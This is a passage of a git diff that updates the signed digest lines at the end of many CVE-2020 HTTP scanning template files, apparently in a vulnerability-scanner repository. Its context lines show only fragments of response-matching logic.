4a0a00473045022037e0569133bc00bbcc070746b5ea4713bedac0789a42062b9de17f9be91838d0022100fd748b4abd749ac286caa76e5f6274eaa717aaf92e1d4a60cdf755f5519bb804:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dcf901208911d80efe5535c7d1800ba9d812efcaf9973d03ed306c465a04f48102210086cd878d60a55c9e0a821014cd8c2da39daea3abeef843b89b17828501966c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 6729bb3925..97d28e8afe 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -38,5 +38,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a004730450221008567460f178d3b82127f84f06e56762a32f15d5044fc57ce08b373700aad8fcc022000f43c082b3552c40fc31a88f402cd043f7c7b93682ef9b7eacedb90f0108f27:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022029e5f6c5004e663704a4fd0230917c85c8ce567a98f3599dbe375241acfb177702210088229770bc0447d815bedab856bf4e14518c36e8e32d3e5522a217085ba3b1c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 7c8bfaa0a0..e4e115f1cb 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200316d98dbc2d3a3fe1f5d0f990c2c4f96803c11e4f2d242de07ad1d30d6db937022100f638f293d459c8852c192a15b7d6108123b9a111b30af964d0c08696534037dd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022026fea313f641cf0956c41560a241000b6e8464b61c6ac00c865bff9d135368fc02210090bf99adc06a577761103aa4a3eb8fd6846b95d34025333f6958302b697c1234:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 1251d71f2c..b5fc9807f1 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200862e1454322caeeb5f0e0ba036de93bff8ec0ab3ff4d683da420135380a065f022100ccc2206a8bf29ba844b3dc1bc755e1e91548400c04fec5847b1198f2b06a2aaa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204b5a04adedbbdb2d861225d73116d820fc420b60b8c7857632af5bdb4c82f56a022100bcbd6999686a54e5b244ef9e9a80ff8fb0324c54a14bf51c12a959918608ca97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 68d45057da..0d56cf813f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -59,5 +59,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - -# digest: 4a0a00473045022100f27c6e453a898cc3305cd0c67420e732c88b57f9d87d38a6c717fc2ed52316fc02207aabedf9f69a7c17831d35fbecbf08b9d500d3d7cab7f1cebb05cc14c78b55e9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a145131e5ea2dd62ba3383ab3be97465e40a8dd34e1acd7d7ce5df25d070b28602207b5b731b630777bbfdae9fc15f81882dd6a1ddbdc265f79debb5b7c41b090123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 8955e5379a..b655377631 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 301 - -# digest: 4a0a004730450220134ea2549696876b651ccc4167b1d429b661fccabd7a673e4dba096dc50e6f3b022100c1e81977a37c155dd5095d1ef24104823f215039af6a1747201ff389b3010c3d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b1ebf68320b25a1a95e6c5371fd8a1d52f76dff33d8bc7a2ea84826b5cc939402202340e29ab45b62220693fc5b795a282117acea26efe0b5a7ea721cbfe01357b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 67d6ec4d89..0879c9a9f8 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203d3e65552fff1e02ceb06eaffacd2621c1c9bf7ff67fef6fa708f9bd7f14c64e022100b83f7081fc166bee9b75f73515809eb8e8fd1f62579a086501861ace4651b67a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008e81e856380bb94b78656f01448eb3df3104edf189700c20e35c115356a64e09022100835bff0a6a4e9574ab4a70b075ad951770847aff70c42a4564f5670101b1cc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 26d4030b78..e4420e00f7 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e0e0f5e6788f325ec9d135c60a4fc8c565a7b701d26ea58192678eaf2c4f5b57022100a33f68799c3762c246a386738343a4a0137dbe26bf78f40405124d05a63a023c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f97c13bb72b41af88c98da44d1d7e007117fbcc11261208fadce1b9f4564fe902203c9520a5857343b1d47f4e668f5fede264e184c74c71ca5fd33b4d3dd8383ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index c4b4500ba4..ca4175c5e8 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -44,5 +44,4 @@ http: part: body words: - "Failed to install the generic artifact type" - -# digest: 490a0046304402205d191ae0cfe46669dc87e8095693769d559c9a84ba34a889c2eea9e636aaee900220571a18fcca6bb43f41d67682e3814271d5bbaf5068f5bc1b8103157860f3199e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d79b94a52c05ef24ba826f372d600575b7443f905f08c385ff9c98a4575e93040221009328b60e91b6e7dd8a91cfde6b5a4e127b90eae2866a5562af3eb9870054ae98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 8dfa2551c3..3f18420e31 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009089a5be96b17c0b6e85e389a7f19dcb7f60965d3b58ffac979e037b8b81f374022100ef8b39a7450dfc04b6b43a694156d9eb9a8823d400d3b78b4bc4d90dff68b34b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f2ef0d81614b1da74bd400f0311203484ce016ace9cebe798744f9c1d4ea74b022100d92c780a42d039b3a652b1ff4071cf32004ebe7b9b9b4addb5a59f694ffc574c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 7dd36c84da..8c52d3f1c7 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b77410580c6523baecf75418c4d4e015c5db69a2178c2df880e4188ebc80b26a022039a80d31c6cb85e2b45dd414a254de9317134aa02fcaabacc2d5e161914ce675:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220724bf8cbbcf87e29964e1cac9d47a0eff4dc6d60f7f330f0f7589ac983f9cc9a022100d6834a24c11c0d1a12475faf6f59ed41ae61601a1e0954f894165b8b2451de05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 4a5f53898f..6567284981 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -50,5 +50,4 @@ http: part: header words: - 'Content-Type: text/html' - -# digest: 490a0046304402201c6ce9492cf1282da750e628dabe9a676659acee38d27e3304ea7281b49165d402204cdaa57c55f10c63607a1f5a2d6a508fd91fa6f3bd7bbe73a5cafbe4d730b527:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e01c8dbe76a89355d64d75718f606b0786d8cb0457b43b190dbc1a6570a044dd0220663dce41a8dabb86eee701b5d6e5f82a7109f148e3725951e2b8db04a0ef16fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 3b766c6a88..4fe937c22c 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b1eec385f4819d5b1be16501416c9659064ee19448313599097e2458cdb6b0660221008f7f4c97bdb5084a92cd080d5143ff7a3912940a32aac0244dcea78c27d18231:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022063697397747450879c07f5832061822ebe1966500746f3a11a477a1a5ee0b0b102201f663e44aefe6f6ffe84292a9cc9b13c3b24679cfdcef34d597d63ff377ae1ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 4cad0c5285..fce44e1a9b 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -77,5 +77,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100841cfe959e02544a50422429468cf940160d132dcf74501d6735501a6c1ed059022100999aee468e7915d4b05f7b3e99833fc7fa5d8413574693f127547e9f15f90340:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d44c893682b97d7fdd35c54c39effeb04567042751eff15b963cd9730206d2ff0221009f04fc7006a7f8f1212e0dca9d7ad42712400b680201b43e93a4c13823d673ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 4448f7d36a..374bd78b5c 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b11c84d5bc134c1a601442783920d6b3e79dcb238f64e57fbce0b8b3acabf02d02205715187f5aa8a53432ccbb7d4c999f7f033b4671b39c78308b193ed654bd037d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c8cd1a7b73458a2d2c501c85ef5fbcd1745410bb2af6ae102927dfe9b61a12902204cc49c1e308a68f5f2cb91312b15ed8c3549600e9c99088c5e75d21cbc69165a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index a2a037b0fb..1468c86726 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008eefc7825e1cfa176b2a6e076d3eab2a6bb1721add62199a4a28f8388613f61502202421cc0c81415a3ad58ec03d1fa21faaaca37b4d5aa3da3dda978a9b961cc9b8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b4233f56bd1d574d32bde445271e55a2960b62701c06a7d0e6d467a3564bb905022100aa598d3d860953ca43d1de60d62405c939ff56d88a451087f28b4c9e902481bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index a468241e4d..9fb2d6ddb6 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ae500c0a3c8404b8c8a58549fb9626c73d276a311b8ef661dd1e660fd203a4f40220490cb96da18991eab82303d08cdf83b47f8d83d97e740b07b1d2442444fe3c76:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b42d6bd1507bac76b3df726867944f45345165d28ad0dc1c09a21c923ada9dab02210087bcb93ffeca9a2cd62356e30dbfab197f3b01f245e54e170d80743f4d1dbf3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index f856514761..1529d6ccc7 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206d1ff5bc2d7c3d348d062e0f3225d0b84a2088954c11162cdf9121718d1e6026022065e243905e2eebd2e5af01398f3c2f679af5dbccab896bd3fcbbb20d23155142:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ae4c39a014f7a3352bf9e3e1c1e99c0944be2991e482689e0ff3605e8499a28002204f50efef700efa853ef0e6623a7ceb09f37528b8f0eb5b625abf525b0325a4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 59f44a5a5e..a9681d0e26 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 500 - -# digest: 4b0a00483046022100e2aa2f530a2ffee19009ad1c083abee9387238aaf66175c3065273ae8a593346022100b6c7eb5ae9b062c3491486696653ab318a258a47a340595f6e31e225f3e372b9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220208fd5092d2d36cba4dd76ce4c11e48e33731bb40908d0928c3dd878c6f1028b022100a6ed92d68e1b7b571e4c16de4d207739902ed1f347efa93101565084bacd500f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 5508014634..6c72d5c497 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -62,5 +62,4 @@ http: group: 1 regex: - '"name": "Alerta ([0-9.]+)"' - -# digest: 490a0046304402205c53590ad08111c25b5702fdd053041db0629ccbeb79696590d587ca5843210f02200cd786d5177bf5410ce5e94ba13a9a74f293cc84117f19f3c9316a317cc3a301:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d74c3f41d9b678fbdeadae3e180e750e901c6763ddec7f8ad5d320da5e4b479b0221008b7105236adf75843b985dfbb19aa640f482fe3ed61256539e1a1d7c27aa1078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index bc0b16c25c..92c602d8e0 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -44,5 +44,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# digest: 490a0046304402206fc7d82810b6cd61407881101a51f26192fba57e22ea3232487735c505a7525702204e9a38ec8726558b3945558aa9d8715734fa7c7af3c7d0366d85bedea9ca5e0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206670fcdb713c01f3ec3a174942f201136faf4142f42dc3cd14ed4ca7ad412105022100a858943e3900a3b451c370f7d19daf422a9ffbb0bab80f1d44c558daa1829a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 52cc857cf8..802d10cd68 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -59,5 +59,4 @@ http: json: - '.data.users.edges[].node.email' part: body - -# digest: 4a0a00473045022100b9a061c713eed039f8a6e9df13211fdea772de34d25a56213005e4ba3aefeb3a022056f3f39da37a6ac2c9d320ea7e2201f524f9a4b5de4bf8bd11f0492e95a7fc18:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220680222c2a100cf90b14ba8d1a04a73386df862ab100621e4926a3dae25f2642b02203236296799e17ed427c731533cbde7b099961572548a84f6a3cd71aab3b2f69e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index be98c2db86..4cdfceb208 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -52,5 +52,4 @@ http: - 200 - 404 condition: or - -# digest: 4a0a00473045022022ce51d57334a091930fb2cea3a6e39ec1c6e779584f7347ac13b970224f33aa022100b47d403ffe90b5b50ee9413beff25a140d4311efad818da3c3654281a995aae7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e5e2a1ba651d4cb1b3f3d40d9783d558085451d4d4c180e10840da8e623f264e022100d325c510593ef19485db4f733ff2dffe782021a47b81bbb9414f5fb0a99fd4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 456882c71d..73cc44b0b7 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -39,5 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a00473045022100fda55490e24f3d25663d41adbd1ca681b08897bd6eff31613e2217907ea8e66b02200f90709d24d716d9a8d2acf836373c9c59144b0ac9a15f89136d20552e9c1a0d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a957afe3945c1ea67a675c5b5d2185be538ba46daed152de7684517f680b0b6022100a73d6f4cd320be2ddf026d2ce2cc6c93541da41051526b37743053c67c551cad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 95742ccdfa..f20f1f524b 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 500 - -# digest: 4a0a00473045022100b4b914cabf506c765147aa3f208cc1ba0d212923a23d61fcbf797bda9b4ecabe022006f8061c0351f2113fad4775e706982876bd8b4f9d59973ef1673782471b52e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f40bcbf794d40e7d950c23a9d7c545db88a5dbd0bca6bf45976f791aea89092022100f14ff93b9d18e3971b0894a6b945e840463a637ed49c329703ffe2d79ff1ff03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index 67d6da5d7a..538c5a2745 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d6917315809a4705d1f932c312afdee9e3a967112eb5c165d92a3b2d44db5efc02204c7e8b0ec7aac4e701ef39562181d6ca4583fbfd8a467b8b06a312bf23307dbe:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c625d196c1469c7f88a1e9b5b701c60fa7a4ef70e148ce887fedfd9d9b3c2fe5022100950dea6584b5d7169133088b2133a6d89d31027d2dfa12188fa1e727d7d0ebe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 25b638383f..8de33367e8 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022039ef812286ff05da1b884e88d7ff4a247a33c0982bb8fbdee05e8f9a363f9956022075e2eebd12b6a87032cb53f7b686d011e090943440b787de8f535c516292c0a0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100900a84b8c86eb6cd0455794b27b05796830904b59e2a3e52130293522dba0f99022100c5138cbfcce13dc437ac0b7c4e7941a6dca98c90d44373b6b185765499f28c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 7c1234491a..16577bbca0 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ed85c1a4fe46399cb52cc92807e39c8104355d12d24f2689f89bcc804066eb0a022062f9890fcb61d3b2691e9cc6408cacde465fae54896dc8708688a1da43409ed2:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202c33cd01003c1d4cf6e359a00b396edefbde1966ba8386009e868fccf353f622022073d169f5c17c20438a44fc42985f4a1dead8144ec1eede98d29fae4d3a8bdaad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 8ce4a289bf..cff9f8fbc9 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022067956f2beb6237d887075508240064ad793aa214d12dbcdd1274e8546e38d30e0221008535977e3501b5028a572235a518b4544b983a770da4ca08e88f6991686829f4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202b4ab3d030e4dee1101ed3b6e34e9b8d4b32317a1ed61ab6c536738ac5cf3572022100b858d6c8da2ad5a865b798dbfb5a913b9d0fd4f88420b948cc5862c966555e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 509cdfe349..fada7d34f7 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -44,5 +44,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and - -# digest: 4a0a00473045022100f5dd0a38c7523fdd7fa239a1870bf8a7d845b868838ef17bc76936abd9b4cdcc02206c3b9f717e2d65210a4d4e836bb2fb95e2bdfc654f01f40d01f293c7c6fec989:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220624fd6613c4b2494322f3dce6eb5da1039320be7a4b550c1cc277cbe5edce56d0220728ff96501deacfc974914e60d3743b268d8947405e9551087e62916613e8ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 4b30842619..e37002b90e 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202f41d6c41f51982e181884532f2d5db5e92077ec241936e2ca47b576214715e002201e080ce441929f7f650ff239bca6087a33654dc831e4bcb5ed0d34d49127e213:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100894629ccd17532f2387b10077bd45ec9ff0c1086d7fb6ee12dd9dc8ab22a169102203265dbc429440c1615bcb0277096585a5a07c322d7872165df744cd4ae4a30c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 2eac030d73..4938dcdfbb 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022079018741946c2f71ea062a39ea6c952115bce59a6a08dd76204dbb6998afcd83022100b94b8899a0371984be3d4353cfac115867853d0bd2f864a5c714e0a6ff731741:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205bf9fe631c71bbd6885c2eeedf987dea2b70b9fb7c77396721cdf4f78d16ab1d02201a418dc6e75050e8cd6b2b3dc477d6d892bf5b28985f9b283aadd23f2de6ed70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index dadbadd881..9853fc60ad 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205b331c20026e5a5e4528c0f8c86e9f92ac9710f971ff15408aff2a04e0a9f4c1022076f41490b30b203ed4bf45f9489962398dee2e390bce146f344ab3726c64e9e4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a48e7d93ea1377f224d19e2937ed429036d41d5f74c7bcf0b3434b7a190cad4502203b9259a161449d386c6272e7c2114d116c5422c3afcffa729b01608873dd748b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index f6fe6ff61d..950e38df29 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220033f7251c52861d7472e9b50b5a093ec46c2c337fa6ee884f03c9248682a5e3c02203b9e7679ec2ba629bab09b5cddb4a4f4418f68f92f64305e8296e971b48d35fd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bfa909c874f7f28f780fe32700a57b67175f7105ac755d322b587d82e419503b022100fbef45e223d2dd0768ac05e75c83e730ea61594e10d24f6e90f7be19f8cf4159:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 2db400cc47..dab2971d90 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -65,5 +65,4 @@ http: regex: - '"username":"(.*?)"' - '"email":"(.*?)"' - -# digest: 4a0a00473045022100f975113632e644f9740fe3711fb4cca3bab149ce841525c7355241941e51abb202200430f1954b3ab280f7ce9fa9c83402ae8b8f8b63a66bd218869a8ccf7fc89cdb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c10e504c5cb1ccca231c45880fc61ac5be6645bae0eb53959e52079b396209b0022100b83d86fc170cb37aa8bfe0f7e0194d80169133835d1cd2df4905c0af9213d4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index c4b8172b33..f283aad3d4 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220735db9fe3c16198da71142254413fe4c49548cde519f39f3a902b79784fe7b33022100dbe6226a448a6ff9ebbd93cb50c0035d4fa183c7ada17d91fb32ba80926f2ca2:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022000f82dd189fec78c57b738676ca04cecca228175aaa7a2feb5e71758f7d645c002206f713e5c20f6628be07e5c55697f3f21d4eda2dae55d0880fc89d418f1216fac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 7b5eeba89f..8bd726cc5e 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220111557f6ca807b414c3d589a539f77521a287c3a4113fc092120e9e0f1b8853e0220336a115eefb298ea7fca62164e988412ee78e22bfb160362e4fb5ce01653555f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cfa2c05c344391c49836b3bb2afb88e9f0a81ec04fafec023440f03e5ec3b1d402200969426ce5c815148c70f3249cc4a2bb6ff0bf7d54d9675ea3967061371ec18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 2111157524..656e83fe19 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201907727a39a4669ea566faec7b62e46fb1236bd4d68ed56b7d8697ad9b824270022100c673df64e04a5f702d793f82d3b5afdc94bff228a0a0b8ca30b5a9f705874d51:922c64590222798bb761d5b6d8e72950 +# digest: 